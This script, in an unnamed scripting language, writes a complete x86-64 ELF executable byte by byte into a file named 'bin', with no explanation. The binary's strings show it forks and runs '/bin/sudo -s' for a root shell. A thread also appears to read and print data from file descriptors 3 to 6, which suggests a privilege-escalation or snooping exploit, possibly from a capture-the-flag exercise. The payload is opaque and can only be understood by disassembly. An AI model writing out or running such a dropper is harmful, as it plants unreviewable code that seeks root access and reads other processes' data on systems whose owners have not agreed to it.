import fileio
let file = fileio.open('bin', 'ab')
file.write(b'\x7fELF\x02\x01\x01\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x02\x00>\x00\x01\x00\x00\x00')
file.write(b'p\x04\x00@\x00\x00\x00\x00')
file.write(b'@\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xf0\x0f\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00@\x008\x00')
file.write(b'\x05\x00@\x00\x16\x00\x15\x00')
file.write(b'\x06\x00\x00\x00\x04\x00\x00\x00')
file.write(b'@\x00\x00\x00\x00\x00\x00\x00')
file.write(b'@\x00\x00@\x00\x00\x00\x00')
file.write(b'@\x00\x00@\x00\x00\x00\x00')
file.write(b'\x18\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x04\x00\x00\x00')
file.write(b'X\x01\x00\x00\x00\x00\x00\x00')
file.write(b'X\x01\x00@\x00\x00\x00\x00')
file.write(b'X\x01\x00@\x00\x00\x00\x00')
file.write(b'\x0b\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x0b\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x05\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00@\x00\x00\x00\x00')
file.write(b'\xd8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\xd8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00 \x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x06\x00\x00\x00')
file.write(b'\xd8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\xd8\x07 @\x00\x00\x00\x00')
file.write(b'\xd8\x07 @\x00\x00\x00\x00')
file.write(b'\xb0\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x02\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00 \x00\x00\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x06\x00\x00\x00')
file.write(b'\xf8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\xf8\x07 @\x00\x00\x00\x00')
file.write(b'\xf8\x07 @\x00\x00\x00\x00')
file.write(b'0\x01\x00\x00\x00\x00\x00\x00')
file.write(b'0\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'/lib/ld.')
file.write(b'so\x00\x85@\x04\x00\x00')
file.write(b'\x03\x00\x00\x00\x0b\x00\x00\x00')
file.write(b'\n\x00\x00\x00\t\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x03\x00\x00\x00')
file.write(b'\x04\x00\x00\x00\x05\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x06\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\t\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x1f\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'$\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'-\x00\x00\x00\x12\x00\x06\x00')
file.write(b'\xc8\x03\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'3\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'8\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'=\x00\x00\x00\x12\x00\t\x00')
file.write(b'!\x07\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'C\x00\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00waitpid')
file.write(b'\x00pthread')
file.write(b'_create\x00')
file.write(b'usleep\x00p')
file.write(b'uts\x00pre_')
file.write(b'main\x00_in')
file.write(b'it\x00read\x00')
file.write(b'fork\x00_fi')
file.write(b'ni\x00execv')
file.write(b'p\x00libc.s')
file.write(b'o\x00\xbe\x04\x00\x00\x00D')
file.write(b'@\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'H\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x02\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'P\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x03\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'X\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x04\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'`\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x05\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'h\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x07\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'p\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x08\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'x\t @\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\n\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xe8\xb3\x01\x00\x00\xe8\x0e\x03')
file.write(b'\x00\x00\xc2\x00\x00\r\t\x00')
file.write(b'\x85\xc0t$1\xd2\xbe\x0e')
file.write(b'\xff5J\x05 \x00\xff%')
file.write(b'L\x05 \x00\x0f\x1f@\x00')
file.write(b'\xff%J\x05 \x00h\x00')
file.write(b'\x00\x00\x00\xe9\xe0\xff\xff\xff')
file.write(b'\xff%B\x05 \x00h\x01')
file.write(b'\x00\x00\x00\xe9\xd0\xff\xff\xff')
file.write(b'\xff%:\x05 \x00h\x02')
file.write(b'\x00\x00\x00\xe9\xc0\xff\xff\xff')
file.write(b'\xff%2\x05 \x00h\x03')
file.write(b'\x00\x00\x00\xe9\xb0\xff\xff\xff')
file.write(b'\xff%*\x05 \x00h\x04')
file.write(b'\x00\x00\x00\xe9\xa0\xff\xff\xff')
file.write(b'\xff%"\x05 \x00h\x05')
file.write(b'\x00\x00\x00\xe9\x90\xff\xff\xff')
file.write(b'\xff%\x1a\x05 \x00h\x06')
file.write(b'\x00\x00\x00\xe9\x80\xff\xff\xff')
file.write(b'\xff%\x12\x05 \x00h\x07')
file.write(b'\x00\x00\x00\xe9p\xff\xff\xff')
file.write(b'H\xc7\xc1\xc1\x06\x00@H')
file.write(b'\x83\xe4\xf0\xe8\xb0\xff\xff\xff')
file.write(b'\xb8\x88\t @H=\x88')
file.write(b'\t @t\x13\xb8\x00\x00')
file.write(b'\x00\x00H\x85\xc0t\t\xbf')
file.write(b'\x88\t @\xff\xe0f\x90')
file.write(b'\xc3ff.\x0f\x1f\x84\x00')
file.write(b'\x00\x00\x00\x00\x0f\x1f@\x00')
file.write(b'\xbe\x88\t @H\x81\xee')
file.write(b'\x88\t @H\x89\xf0H')
file.write(b'\xc1\xee?H\xc1\xf8\x03H')
file.write(b'\x01\xc6H\xd1\xfet\x11\xb8')
file.write(b'\x00\x00\x00\x00H\x85\xc0t')
file.write(b'\x07\xbf\x88\t @\xff\xe0')
file.write(b'\xc3ff.\x0f\x1f\x84\x00')
file.write(b'\x00\x00\x00\x00\x0f\x1f@\x00')
file.write(b'\x80=\xa9\x04 \x00\x00u')
file.write(b'wUH\x8b\x05\xa7\x04 ')
file.write(b'\x00H\x89\xe5ATA\xbc')
file.write(b'\xe8\x07 @S\xbb\xf0\x07')
file.write(b' @H\x81\xeb\xe8\x07 ')
file.write(b'@H\xc1\xfb\x03H\x83\xeb')
file.write(b'\x01H9\xd8s%f.')
file.write(b'\x0f\x1f\x84\x00\x00\x00\x00\x00')
file.write(b'H\x83\xc0\x01H\x89\x05m')
file.write(b'\x04 \x00A\xff\x14\xc4H')
file.write(b'\x8b\x05b\x04 \x00H9')
file.write(b'\xd8r\xe5\xe80\xff\xff\xff')
file.write(b'\xb8\x00\x00\x00\x00H\x85\xc0')
file.write(b't\n\xbfx\x07\x00@\xe8')
file.write(b'\x9c\xfa\xff\xbf[A\\\xc6')
file.write(b'\x052\x04 \x00\x01]\xc3')
file.write(b'\xc3ff.\x0f\x1f\x84\x00')
file.write(b'\x00\x00\x00\x00\x0f\x1f@\x00')
file.write(b'\xb8\x00\x00\x00\x00H\x85\xc0')
file.write(b't\x1eU\xbe\xc0\t @')
file.write(b'\xbfx\x07\x00@H\x89\xe5')
file.write(b'\xe8c\xfa\xff\xbf]\xe9\r')
file.write(b'\xff\xff\xff\x0f\x1fD\x00\x00')
file.write(b'\xe9\x03\xff\xff\xffUH\x89')
file.write(b'\xe5H\x81\xec \x04\x00\x00')
file.write(b'H\x89\xbd\xe8\xfb\xff\xff\xbf')
file.write(b'd\x00\x00\x00\xe8G\xfe\xff')
file.write(b'\xff\xc7E\xfc\x03\x00\x00\x00')
file.write(b'\xebeH\xc7\x85\xf0\xfb\xff')
file.write(b'\xff\x00\x00\x00\x00H\xc7\x85')
file.write(b'\xf8\xfb\xff\xff\x00\x00\x00\x00')
file.write(b'H\x8d\x95\x00\xfc\xff\xff\xb8')
file.write(b'\x00\x00\x00\x00\xb9~\x00\x00')
file.write(b'\x00H\x89\xd7\xf3H\xabH')
file.write(b'\x8d\x8d\xf0\xfb\xff\xff\x8bE')
file.write(b'\xfc\xba\x00\x04\x00\x00H\x89')
file.write(b'\xce\x89\xc7\xe8(\xfe\xff\xff')
file.write(b'\x89E\xf8\x83}\xf8\x00~')
file.write(b'\x11H\x8d\x85\xf0\xfb\xff\xff')
file.write(b'H\x89\xc7\xe8\xf0\xfd\xff\xff')
file.write(b'\xeb\x01\x90\x83E\xfc\x01\x83')
file.write(b'}\xfc\x06~\x95\xeb\x80U')
file.write(b'H\x89\xe5H\x83\xec0\xe8')
file.write(b'\x04\xfe\xff\xff\x89E\xfc\x83')
file.write(b'}\xfc\x00\x0f\x94\xc0\x0f\xb6')
file.write(b'\xc0\x89E\xf8\x83}\xf8\x00')
file.write(b'tHH\x8dE\xf0\xb9\x00')
file.write(b'\x00\x00\x00\xba\xad\x05\x00@')
file.write(b'\xbe\x00\x00\x00\x00H\x89\xc7')
file.write(b'\xe8\x83\xfd\xff\xffH\xc7E')
file.write(b'\xd0)\x07\x00@H\xc7E')
file.write(b'\xd83\x07\x00@H\xc7E')
file.write(b'\xe0\x00\x00\x00\x00H\x8bE')
file.write(b'\xd0H\x8dU\xd0H\x89\xd6')
file.write(b'H\x89\xc7\xe8\xb8\xfd\xff\xff')
file.write(b'\xeb\x14\x8bE\xfc\xba\x00\x00')
file.write(b'\x00\x00\xbe\x00\x00\x00\x00\x89')
file.write(b'\xc7\xe82\xfd\xff\xff\x90\xc9')
file.write(b'\xc3UH\x89\xe5\xb8\x00\x00')
file.write(b'\x00\x00\xe8p\xff\xff\xff\xb8')
file.write(b'\x00\x00\x00\x00]\xc3f.')
file.write(b'\x0f\x1f\x84\x00\x00\x00\x00\x00')
file.write(b'H\x8b\x05\xf1\x00 \x00H')
file.write(b'\x83\xf8\xfft3UH\x89')
file.write(b'\xe5S\xbb\xd8\x07 @H')
file.write(b'\x83\xec\x08\x0f\x1fD\x00\x00')
file.write(b'\xff\xd0H\x8bC\xf8H\x83')
file.write(b'\xeb\x08H\x83\xf8\xffu\xf0')
file.write(b'H\x8b]\xf8\xc9\xc3f.')
file.write(b'\x0f\x1f\x84\x00\x00\x00\x00\x00')
file.write(b'\xc3\xe8\xca\xfd\xff\xff\xc2\x00')
file.write(b'\x00/bin/su')
file.write(b'do\x00-s\x00\x1f\x00')
file.write(b'\x14\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01zR\x00\x01x\x10\x01')
file.write(b'\x1b\x0c\x07\x08\x90\x01\x00\x00')
file.write(b'$\x00\x00\x00\x1c\x00\x00\x00')
file.write(b'\x88\xfc\xff\xff\x90\x00\x00\x00')
file.write(b'\x00\x0e\x10F\x0e\x18J\x0f')
file.write(b'\x0bw\x08\x80\x00?\x1a;')
file.write(b'*3$"\x00\x00\x00\x00')
file.write(b'\x18\x00\x00\x00D\x00\x00\x00')
file.write(b'-\xfe\xff\xff\x92\x00\x00\x00')
file.write(b'\x00A\x0e\x10\x86\x02C\r')
file.write(b'\x06\x00\x00\x00\x1c\x00\x00\x00')
file.write(b'`\x00\x00\x00\xa3\xfe\xff\xff')
file.write(b'\x82\x00\x00\x00\x00A\x0e\x10')
file.write(b'\x86\x02C\r\x06\x02}\x0c')
file.write(b'\x07\x08\x00\x00\x1c\x00\x00\x00')
file.write(b'\x80\x00\x00\x00\x05\xff\xff\xff')
file.write(b'\x15\x00\x00\x00\x00A\x0e\x10')
file.write(b'\x86\x02C\r\x06P\x0c\x07')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xff\xff\xff\xff\xff\xff\xff\xff')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xff\xff\xff\xff\xff\xff\xff\xff')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'J\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x0c\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xc8\x03\x00@\x00\x00\x00\x00')
file.write(b'\r\x00\x00\x00\x00\x00\x00\x00')
file.write(b'!\x07\x00@\x00\x00\x00\x00')
file.write(b'\x04\x00\x00\x00\x00\x00\x00\x00')
file.write(b'h\x01\x00@\x00\x00\x00\x00')
file.write(b'\x05\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xb0\x02\x00@\x00\x00\x00\x00')
file.write(b'\x06\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xa8\x01\x00@\x00\x00\x00\x00')
file.write(b'\n\x00\x00\x00\x00\x00\x00\x00')
file.write(b'R\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x0b\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x15\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'(\t @\x00\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xc0\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x14\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x07\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x17\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x03\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xf8\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xf6\x03\x00@\x00\x00\x00\x00')
file.write(b'\x06\x04\x00@\x00\x00\x00\x00')
file.write(b'\x16\x04\x00@\x00\x00\x00\x00')
file.write(b'&\x04\x00@\x00\x00\x00\x00')
file.write(b'6\x04\x00@\x00\x00\x00\x00')
file.write(b'F\x04\x00@\x00\x00\x00\x00')
file.write(b'V\x04\x00@\x00\x00\x00\x00')
file.write(b'f\x04\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'GNU C cr')
file.write(b'ti.s\x00GCC')
file.write(b': (GNU) ')
file.write(b'10.3.0\x00G')
file.write(b'NU C crt')
file.write(b'n.o\x00\x89\xe0\xb9\x01')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x04\x00\xf1\xff')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x0c\x00\x00\x00\x01\x00\x0c\x00')
file.write(b'\xd8\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x1a\x00\x00\x00\x01\x00\r\x00')
file.write(b'\xe8\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'(\x00\x00\x00\x01\x00\x0b\x00')
file.write(b'x\x07\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b';\x00\x00\x00\x02\x00\x08\x00')
file.write(b'\x80\x04\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'=\x00\x00\x00\x02\x00\x08\x00')
file.write(b'\xb0\x04\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'P\x00\x00\x00\x02\x00\x08\x00')
file.write(b'\xf0\x04\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'f\x00\x00\x00\x01\x00\x11\x00')
file.write(b'\xa0\t @\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'r\x00\x00\x00\x01\x00\x11\x00')
file.write(b'\xa8\t @\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'}\x00\x00\x00\x02\x00\x08\x00')
file.write(b'\x80\x05\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x89\x00\x00\x00\x01\x00\x11\x00')
file.write(b'\xc0\t @\x00\x00\x00\x00')
file.write(b'0\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x04\x00\xf1\xff')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x92\x00\x00\x00\x01\x00\x0c\x00')
file.write(b'\xe0\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x9f\x00\x00\x00\x01\x00\x0b\x00')
file.write(b'\xd4\x07\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xad\x00\x00\x00\x02\x00\x08\x00')
file.write(b'\xe0\x06\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xc3\x00\x00\x00\x04\x00\xf1\xff')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x04\x00\xf1\xff')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xc7\x00\x00\x00\x01\x00\x0e\x00')
file.write(b'\xf8\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xd0\x00\x00\x00\x00\x00\x0c\x00')
file.write(b'\xd8\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xe1\x00\x00\x00\x01\x00\x0f\x00')
file.write(b'(\t @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xf7\x00\x00\x00\x00\x00\x0c\x00')
file.write(b'\xd8\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\n\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x12\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'!\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'(\x01\x00\x00\x11\x02\x10\x00')
file.write(b'\x88\t @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'4\x01\x00\x00\x11\x02\r\x00')
file.write(b'\xf0\x07 @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'A\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'F\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'O\x01\x00\x00\x11\x02\x10\x00')
file.write(b'\x80\t @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\\\x01\x00\x00\x12\x00\x06\x00')
file.write(b'\xc8\x03\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'b\x01\x00\x00\x12\x00\x08\x00')
file.write(b'?\x06\x00@\x00\x00\x00\x00')
file.write(b'\x82\x00\x00\x00\x00\x00\x00\x00')
file.write(b'n\x01\x00\x00\x12\x00\x08\x00')
file.write(b'\xad\x05\x00@\x00\x00\x00\x00')
file.write(b'\x92\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x8b\x01\x00\x00\x10\x00\x08\x00')
file.write(b'p\x04\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'|\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x81\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x86\x01\x00\x00\x10\x00\x11\x00')
file.write(b'\x88\t @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'J\x01\x00\x00\x12\x00\x08\x00')
file.write(b'\xc1\x06\x00@\x00\x00\x00\x00')
file.write(b'\x15\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x92\x01\x00\x00\x12\x00\t\x00')
file.write(b'!\x07\x00@\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x98\x01\x00\x00\x10\x00\x10\x00')
file.write(b'\x88\t @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xdc\x00\x00\x00\x10\x00\x11\x00')
file.write(b'\xf0\t @\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x9f\x01\x00\x00\x12\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00crtstuf')
file.write(b'f.c\x00__CT')
file.write(b'OR_LIST_')
file.write(b'_\x00__DTOR')
file.write(b'_LIST__\x00')
file.write(b'__EH_FRA')
file.write(b'ME_BEGIN')
file.write(b'__\x00dereg')
file.write(b'ister_tm')
file.write(b'_clones\x00')
file.write(b'__do_glo')
file.write(b'bal_dtor')
file.write(b's_aux\x00co')
file.write(b'mpleted.')
file.write(b'2\x00dtor_i')
file.write(b'dx.1\x00fra')
file.write(b'me_dummy')
file.write(b'\x00object.')
file.write(b'0\x00__CTOR')
file.write(b'_END__\x00_')
file.write(b'_FRAME_E')
file.write(b'ND__\x00__d')
file.write(b'o_global')
file.write(b'_ctors_a')
file.write(b'ux\x00a.c\x00_')
file.write(b'DYNAMIC\x00')
file.write(b'__init_a')
file.write(b'rray_end')
file.write(b'\x00_GLOBAL')
file.write(b'_OFFSET_')
file.write(b'TABLE_\x00_')
file.write(b'_init_ar')
file.write(b'ray_star')
file.write(b't\x00waitpi')
file.write(b'd\x00pthrea')
file.write(b'd_create')
file.write(b'\x00usleep\x00')
file.write(b'__TMC_EN')
file.write(b'D__\x00__DT')
file.write(b'OR_END__')
file.write(b'\x00puts\x00pr')
file.write(b'e_main\x00_')
file.write(b'_dso_han')
file.write(b'dle\x00_ini')
file.write(b't\x00thread')
file.write(b'Thing\x00th')
file.write(b'readHand')
file.write(b'ler\x00read')
file.write(b'\x00fork\x00__')
file.write(b'bss_star')
file.write(b't\x00_fini\x00')
file.write(b'_edata\x00e')
file.write(b'xecvp\x00\x00.')
file.write(b'symtab\x00.')
file.write(b'strtab\x00.')
file.write(b'shstrtab')
file.write(b'\x00.interp')
file.write(b'\x00.hash\x00.')
file.write(b'dynsym\x00.')
file.write(b'dynstr\x00.')
file.write(b'rela.plt')
file.write(b'\x00.init\x00.')
file.write(b'text\x00.fi')
file.write(b'ni\x00.roda')
file.write(b'ta\x00.eh_f')
file.write(b'rame\x00.ct')
file.write(b'ors\x00.dto')
file.write(b'rs\x00.dyna')
file.write(b'mic\x00.got')
file.write(b'.plt\x00.da')
file.write(b'ta\x00.bss\x00')
file.write(b'.comment')
file.write(b'\x000\xff\xff\xffD\x89\xe7')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x1b\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b'X\x01\x00@\x00\x00\x00\x00')
file.write(b'X\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x0b\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'#\x00\x00\x00\x05\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b'h\x01\x00@\x00\x00\x00\x00')
file.write(b'h\x01\x00\x00\x00\x00\x00\x00')
file.write(b'@\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x04\x00\x00\x00\x00\x00\x00\x00')
file.write(b')\x00\x00\x00\x0b\x00\x00\x00')
